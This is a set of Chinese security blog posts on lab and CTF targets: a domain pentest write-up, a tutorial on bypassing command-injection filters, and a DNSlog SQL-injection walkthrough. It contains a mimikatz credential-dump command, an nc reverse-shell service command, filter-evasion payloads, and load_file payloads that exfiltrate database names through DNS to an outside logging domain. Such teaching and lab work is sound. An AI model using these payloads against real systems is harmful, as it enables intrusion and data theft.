域控攻击路径 凭证抓取： mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" 远程执行： sc \192.168.93.10 create ncshell binpath="cmd /c c:nc.exe 192.168.93.20 1234 -e cmd" 权限提升：通过RDP连接接管域控服务器 6. 渗透测试结果 主机IP 操作系统 获取权限级别 关键漏洞/方法 192.168.1.110 CentOS 7 root Joomla SQL注入 + Dirty Cow 192.168.93.20 Windows 2008 SYSTEM SMB密码爆破 + Mimikatz 192.168.93.10 Windows 2012 Domain Admin 横向移动 + 凭证重用 192.168.93.30 Windows 7 Administrator 永恒之蓝漏洞利用 7. 风险总结与修复建议7.1 高风险项 弱密码策略 SMB服务密码123qwe!ASD强度不足 建议：启用复杂度策略 + 定期强制修改 过时软件漏洞 Joomla 3.9.12存在未授权数据库写入风险 建议：升级至最新LTS版本 + 禁用备份文件访问 横向防御缺失 内网主机未部署EDR/流量监控 建议：部署微隔离策略 + 启用Windows Defender ATP 7.2 加固措施 网络层： # 防火墙规则示例（Linux） iptables -A INPUT -p tcp --dport 3306 -j DROP # 禁用MySQL外网访问 系统层： # Windows组策略 Set-ItemProperty "HKLM:SYSTEMCurrentControlSetControlLsa" -Name "DisableDomainCreds" -Value 1 # 禁止明文凭据缓存 应用层： # Nginx配置隐藏版本号 server_tokens off; 8. 总结与反思本次测试暴露了企业网络在边界防护、密码管理和漏洞修复方面的严重不足。建议企业： 建立常态化红蓝对抗机制 每季度执行一次外部漏洞扫描 对运维人员开展ATT&CK攻击链防御培训 渗透测试不仅是技术验证，更是安全意识的觉醒。——By 泷羽Sec安全攻防团队往期推荐红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略【渗透测试】ATT&CK靶场一，phpmyadmin，域渗透，内网横向移动攻略【oscp】vulnerable_docker，三种代理方法打入内网【oscp】Tr0ll 靶机全系列（1-3），FTP被玩坏了HTB-Chemistry靶机渗透教程

从0-1讲解RCE漏洞绕过，Windows与LinuxRCE漏洞绕过实战解析 从0-1讲解RCE漏洞绕过，Windows与Linux/RCE漏洞绕过方式总结----实战解析前言本文讲解了windows/Linux的常见命令以及命令执行漏洞的绕过方式，靶场环境为ctfhub，分别有命令注入、cat过滤、空格过滤、过滤目录分隔符、运算符过滤，这几种绕过方式Windows我们在windows命令行中执行命令的时候，是不区分大小写的C:\>WHOAMI yv\administrator 在命令行中可以有无数个"C:\>wh""""oami yv\administrator C:\>wh""""""""""""""""""""""""""""""oami yv\administrator 不能有两个连续的^C:\>whoa^mi yv\administrator C:\>whoam^^i 'whoam^i' 不是内部或外部命令，也不是可运行的程序 或批处理文件。 C:\>who^a^m^i yv\administrator 在命令中如果 " 在^之前，此时"的数量必须为偶数C:\>who""a^mi yv\administrator C:\>who"a^mi 'who"a^mi' 不是内部或外部命令，也不是可运行的程序 或批处理文件。 在命令中"在^之后，且带有参数，则”也需要带有偶数C:\>n^et" user 'net" user' 不是内部或外部命令，也不是可运行的程序 或批处理文件。 C:\>n^et"" user \\YV 的用户帐户 ------------------------------------------------------------------------------- Administrator DefaultAccount Guest mysql WDAGUtilityAccount www 命令成功完成。 也可以使用()对命令进行包裹C:\>(whoami) yv\administrator C:\>(n^et"" user) \\YV 的用户帐户 ------------------------------------------------------------------------------- Administrator DefaultAccount Guest mysql WDAGUtilityAccount www 命令成功完成。 ()的数量不设上限C:\>(((whoami))) yv\administrator 使用变量简单拼接%%局部分开每个变量C:\>set cmd1=who C:\>set cmd2=am C:\>set cmd3=i C:\>%cmd1%%cmd2%%cmd3% yv\administrator 变量拼接方式二C:\>set cmd1=who C:\>set cmd3=i C:\>%cmd1%am%cmd3% yv\administrator 变量拼接方式三C:\>set cmd1=wh"""o C:\>set cmd3=i""" C:\>%cmd1%am%cmd3% yv\administrator 变量拼接方式四 ^C:\>set cmd1=wh""""o # 这里需要偶数，因为在变量拼接结果中有 ^ C:\>set cmd3=i""" # 后面正常多少个 " 都行 C:\>%cmd1%a^m%cmd3% yv\administrator 含有参数的命令，net userC:\>set cmd1=s""er C:\>set cmd2=t u C:\>set cmd3=n^e C:\>%cmd3%%cmd2%%cmd1% \\YV 的用户帐户 ------------------------------------------------------------------------------- Administrator DefaultAccount Guest mysql WDAGUtilityAccount www 命令成功完成。 一次性执行多条命令C:\>cmd /C "set cmd1=s""ser && set cmd2=t u && set cmd3=n^e && %cmd3%%cmd2%%cmd1%" \\YV 的用户帐户 ------------------------------------------------------------------------------- Administrator DefaultAccount Guest mysql WDAGUtilityAccount www 命令成功完成。 Windows环境变量切分先设置一个变量C:\>set cmd=whoami C:\>%cmd% yv\administrator 这个0,1表示的数组切片，代表前后切片的索引C:\>set cmd=whoami C:\>echo %cmd:~0,1% w C:\>echo %cmd:~0,4% whoa 也可以为负数，负数表示从右边开始数第几个C:\>set cmd=whoami C:\>echo %cmd:~-4,4% oami C:\>echo %cmd:~-6,4% whoa 当然也能直接向外部写一个php一句话木马检查是否存在for循环执行命令C:\>cmd /V:ON /C "set kpx=awlh2im,xiaoyu&& for %G in (1,3,-3,0,6,5) do set lq=!lq!!kpx:~%G,1!&& if %G==5 !lq:~4!" C:\>set lq=!lq!!kpx:~1,1! && if 1 == 5 !lq:~4! C:\>set lq=!lq!!kpx:~3,1! && if 3 == 5 !lq:~4! C:\>set lq=!lq!!kpx:~-3,1! && if -3 == 5 !lq:~4! C:\>set lq=!lq!!kpx:~0,1! && if 0 == 5 !lq:~4! C:\>set lq=!lq!!kpx:~6,1! && if 6 == 5 !lq:~4! C:\>set lq=!lq!!kpx:~5,1! && if 5 == 5 !lq:~4! yv\administrator LinuxLinux中是区分大小写的┌──(root㉿251ebe86465a)-[/] └─# LS LS: command not found ┌──(root㉿251ebe86465a)-[/] └─# Ls Ls: command not found 运算符;表示连续指令，即使前面那条命令报错，后面也会接着执行┌──(root㉿251ebe86465a)-[/] └─# LS;whoami LS: command not found root & 用于后台执行命令，这个可能看不出来┌──(root㉿251ebe86465a)-[/] └─# ls&wHoami [1] 59 archive-key.asc boot etc lib lib64 mnt proc run srv tmp var bin dev home lib32 media opt root sbin sys usr Command 'Whoami' not found, did you mean: command 'whoami' from deb coreutils Try: apt install <deb name> [1]+ Done ls --color=auto 我们使用ping 127.0.0.1 & whoami，这条命令会将ping放在后台执行，这个时候你没有设置ping的次数，就会一直执行下去，停止不了，而whoami已经执行完毕了。┌──(root㉿kali)-[/usr/local] └─# ping 127.0.0.1& whoami [1] 4508 root PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=5.80 ms ┌──(root㉿kali)-[/usr/local] └─# 64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.593 ms 64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.049 ms 64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.044 ms 64 bytes from 127.0.0.1: icmp_seq=5 ttl=64 time=0.058 ms 64 bytes from 127.0.0.1: icmp_seq=6 ttl=64 time=0.045 ms --------之后将会一直运行下去，也停止不了。。。。 &&连接两个指令的时候，要保证命令两个命令都能正常执行，否则一个错，就执行不了了┌──(root㉿251ebe86465a)-[/] └─# ls&&whoami archive-key.asc boot etc lib lib64 mnt proc run srv tmp var bin dev home lib32 media opt root sbin sys usr root ┌──(root㉿251ebe86465a)-[/] └─# LS&&whoami LS: command not found |管道符：用于将一个命令的输出作为另一个命令的输入。它允许两个或多个命令之间传递数据。例如，我获取这个/data路径的下的所有包含boo的文件┌──(root㉿251ebe86465a)-[/] └─# ls | grep '*boo*' boot ||逻辑运算符：如果||左边的命令执行失败（返回非零退出状态），那么||右边的命令将会被执行。执行成功一个命令后，后面的苏哦有命令都不会执行。┌──(root㉿251ebe86465a)-[/] └─# ip addr || wHoami || ls 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 5: eth0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0 inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0 valid_lft forever preferred_lft forever 转义字符\┌──(root㉿251ebe86465a)-[/] └─# who\ami root ''，()，$，``┌──(root㉿251ebe86465a)-[/] └─# who''ami root ┌──(root㉿251ebe86465a)-[/] └─# (whoami) root ┌──(root㉿251ebe86465a)-[/] └─# (who''ami) root ┌──(root㉿251ebe86465a)-[/] └─# `(echo whoami)` root ┌──(root㉿251ebe86465a)-[/] └─# $(echo whoami) root 命令引用┌──(root㉿kali)-[/data] └─# t=l;j=s;$t$j #相当于执行了 ls 谷歌插件 GitHack miku Linux特有变量$1，$*，$@，$n这个n表示除0以外的任意数字，都可以作为系统命令绕过的方式┌──(root㉿kali)-[/data] └─# who$2ami root ┌──(root㉿kali)-[/data] └─# who$4ami root ┌──(root㉿kali)-[/data] └─# who$*ami root ┌──(root㉿kali)-[/data] └─# who$@ami root ┌──(root㉿kali)-[/data] └─# who$0ami who-zshami：未找到命令 Linux通配符我们以执行whoami这个命令来进行测试┌──(root㉿kali)-[/etc/docker] └─# whereis whoami whoami: /usr/bin/whoami /usr/share/man/man1/whoami.1.gz ┌──(root㉿kali)-[/etc/docker] └─# /usr/bin/whoam* root ┌──(root㉿kali)-[/etc/docker] └─# /usr/bin/whoam? root ┌──(root㉿kali)-[/etc/docker] └─# /usr/bin/wh?am? root ┌──(root㉿kali)-[/etc/docker] └─# /usr/bin/????mi root ┌──(root㉿kali)-[/etc/docker] └─# /u?r/b?n/????mi root ┌──(root㉿kali)-[/etc/docker] └─# /*/b?n/????mi root Linux中命令中的命令虽然会报错，但是命令也会正常执行┌──(root㉿kali)-[/etc/docker] └─# `666666` 666666：未找到命令 ┌──(root㉿kali)-[/etc/docker] └─# 666666`whoami`6666 666666root6666：未找到命令 ┌──(root㉿kali)-[/etc/docker] └─# `6666`whoami`6666` 6666：未找到命令 6666：未找到命令 root ┌──(root㉿kali)-[/etc/docker] └─# 6666`whoami`6666 6666root6666：未找到命令 ┌──(root㉿kali)-[/etc/docker] └─# w`sfdawfewa`ho`sajfdkljas`am`sdjflk123`i sfdawfewa：未找到命令 sajfdkljas：未找到命令 sdjflk123：未找到命令 root ┌──(root㉿kali)-[/etc/docker] └─# wh${sdf}oam${ddkjdld}i root ┌──(root㉿kali)-[/etc/docker] └─# wh${sdf242341}oam${ddkjdld234232}i root Linux环境变量切割查看环境变量┌──(root㉿251ebe86465a)-[/] └─# echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 查看环境变量的长度┌──(root㉿251ebe86465a)-[/] └─# echo ${#PATH} 60 分割环境变量┌──(root㉿kali)-[/etc/docker] └─# echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/root/.dotnet/tools ┌──(root㉿kali)-[/usr/local] └─# echo ${PATH:0:10} /usr/local ┌──(root㉿kali)-[/usr/local] └─# echo ${PATH:0:1} / 靶场练习CTFHUB 使用&&符号，没有获取到想要的结果，因为&&在前一个命令没有执行结束的时候，是不会执行后面的命令的。当然还有种思路就是指定次数，使用-c参数，这里是没有效果的┌──(root㉿kali)-[~] └─# ping -c 2 127.0.0.1 PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.489 ms 64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.106 ms --- 127.0.0.1 ping statistics --- 2 packets transmitted, 2 received, 0% packet loss, time 1004ms rtt min/avg/max/mdev = 0.106/0.297/0.489/0.191 ms ;绕过┌──(root㉿kali)-[~] └─# ping -c 2 127.0.0.1;whoami PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.558 ms 64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.047 ms --- 127.0.0.1 ping statistics --- 2 packets transmitted, 2 received, 0% packet loss, time 1008ms rtt min/avg/max/mdev = 0.047/0.302/0.558/0.255 ms root 使用&也可以得到结果，通过将ping命令放到后台执行，后面的结果也会执行[1] => /sys/devices/platform/serial8250/tty/ttyS2/flags payload：127.0.0.1 & cat /sys/devices/platform/serial8250/tty/ttyS2/flags [2] => /sys/devices/platform/serial8250/tty/ttyS0/flags payload：127.0.0.1 & cat /sys/devices/platform/serial8250/tty/ttyS0/flags [3] => /sys/devices/platform/serial8250/tty/ttyS3/flags payload：127.0.0.1 & cat /sys/devices/platform/serial8250/tty/ttyS3/flags [4] => /sys/devices/platform/serial8250/tty/ttyS1/flags payload：127.0.0.1 & cat /sys/devices/platform/serial8250/tty/ttyS1/flags [5] => /sys/devices/virtual/net/tunl0/flags payload：127.0.0.1 & cat /sys/devices/virtual/net/tunl0/flags [6] => /sys/devices/virtual/net/lo/flags payload：127.0.0.1 & cat /sys/devices/virtual/net/lo/flags 这些payload都给你们试过了，没有flag不断执行命令，找到这个web目录中有一个数字.php查看即可得知payload127.0.0.1 & cat /var/www/html/17165225371506.php 查看源码过滤cat题目：过滤了cat命令之后，你还有什么方法能读到 Flag?查看目录，他换了个名字没有cat那么在Linux中还有这样几个命令tac命令是cat命令的反向操作，它会按行读取文件内容，但会以相反的顺序输出。这意味着文件的最后一行将首先显示，而第一行将最后显示。127.0.0.1 &tac /var/www/html/flag_9902871730290.php less命令与more命令类似，也是用于分页显示文本文件的内容，但less提供了更多的导航选项，如向前翻页、向后翻页、搜索文本等。127.0.0.1 &less 5 /var/www/html/flag_9902871730290.php head命令用于显示文件的开头部分，默认显示前10行，但可以通过选项指定显示的行数。127.0.0.1 &head 5 /var/www/html/flag_9902871730290.php tail命令用于显示文件的末尾部分，默认显示最后10行，与head命令相对应。它还可以用于实时跟踪文件的新增内容。127.0.0.1 &tail 5 /var/www/html/flag_9902871730290.php nl命令与cat -b命令相似，用于显示文件内容并在每行前加上行号，但nl提供了更多的格式化选项。127.0.0.1 & nl /var/www/html/flag_9902871730290.php awk是一个强大的文本处理工具，虽然它主要用于模式扫描和处理语言，但在某些情况下，可以使用awk命令以类似于cat的方式显示文件内容，同时添加额外的文本处理功能。127.0.0.1 & awk '{print}' /var/www/html/flag_9902871730290.php more命令用于分页显示文本文件的内容，用户可以通过按空格键翻页，按b键回退，按q键退出。虽然它主要用于分页查看，但在逐页查看文件内容时，与cat命令直接显示整个文件内容的方式形成对比。127.0.0.1 & more /var/www/html/flag_9902871730290.php 过滤空格分析源码，使用preg_match_all函数检查变量$ip中是否包含空格。空格的绕过方式一般有(针对于本题来讲)1、${IFS}代替空格127.0.0.1&ls${IFS}/var/www/html/2、%09相当于tab键127.0.0.1&ls%09/var/www/html/3、大括号{}127.0.0.1&{ls,/var/www/html/}4、重定向字符> <>举例┌──(root㉿kali)-[/data] └─# ping -c 1 127.0.0.1;ls<>-l PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.701 ms --- 127.0.0.1 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.701/0.701/0.701/0.000 ms 谷歌插件 GitHack -l miku payload：127.0.0.1&ls<>/var/www/html/经过测试，上面四种仅有${IFS}成功完整payload127.0.0.1&cat${IFS}/var/www/html/flag_172742853821990.php 过滤目录分隔符题目：这次过滤了目录分割符 / ，你能读到 flag 目录下的 flag 文件吗？直接使用ls查看目录，没有东西试试%2F127.0.0.1 & ls %2Fvar%2Fwww%2Fhtml 那我们直接ls使用cd和;进行多行命令执行即可，一级目录一级目录的cd即可127.0.0.1;cd flag_is_here;cat flag_31328570616525.php 过滤运算符题目：过滤了几个运算符, 要怎么绕过呢？分析源码，过滤了运算符，但是也没完全过滤，少了个;;即可127.0.0.1;cat flag_5393398119154.php 往期文章推荐Love-Yi情侣网站存在SQL注入漏洞【kali笔记】 Kali Shell编程从基础到进阶【kali笔记】Metasploit Framework (MSF) 从基础到进阶使用指南SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细我的《护网奇遇记》 

sql注入之dnslog DNSlog注入全解析DNSlog原理 DNS（Domain Name System）：负责将域名转换为IP地址，以便浏览器能访问对应服务器上的服务。 DNSlog：即DNS的日志，记录了域名解析时的域名和解析IP的信息。 DNSlog外带原理：通过在高级域名中嵌入信息，利用DNS解析时留下的日志，将信息传递并读取，以获取请求信息。 DNSlog注入 关键函数：Load_file，用于读取文件并返回其内容为字符串。访问互联网文件时，需在最前面加上“//”。 使用前提： 存在注入点。 拥有root权限。 数据库具有读写权限，即secure_file_priv设置为空字符串。 具备请求URL的权限。 必须是Windows服务器环境。 复现过程D盘中写了个1.txt通过load_file函数，读取一下 select load_file('D:/1.txt')由于在通过load_file外带时是无法执行sql语句的，所以要通过concat函数，将执行的sql语句,与DNS请求的url进行拼接select concat('Sentiment','\',(select database()));这里我用的是dnslog.org，获取一个随机的dns域名接下来通过sqli第一关进行演示，通过你获取的随机dns域名DNSlog外带数据库信息，注意dns域名前面需要有个点，否则会导致外带不成功http://192.168.209.149/Less-1/?id=1' and load_file(concat('\\\',database(),'.eaf61aee.log.dnslog.biz./abc')) -- w此时dns解析记录就有了你靶机的数据库名称前缀外带表名?id=1' and load_file(concat('\\\',(select group_concat(table_name separator '-') from information_schema.tables where table_schema=database()),'.eaf61aee.log.dnslog.biz./abc')) -- w外带列名?id=1' and load_file(concat('\\\',(select group_concat(column_name separator '-') from information_schema.columns where table_schema=database() and table_name='users'),'.eaf61aee.log.dnslog.biz./abc')) -- w局限性通过本地测试后,发现了一些问题，在url中传递字符有一定的局限性，很多字符是无法传递的，所以在外带时，可以通过十六进制编码绕过符号的局限性?id=1' and load_file(concat('\\\',(select hex(group_concat(column_name separator '_')) from information_schema.columns where table_schema=database() and table_name='users'),'.eaf61aee.log.dnslog.biz./abc')) -- w十六进制转字符网安学习不迷路，欢迎各位网络安全大佬进来交流学习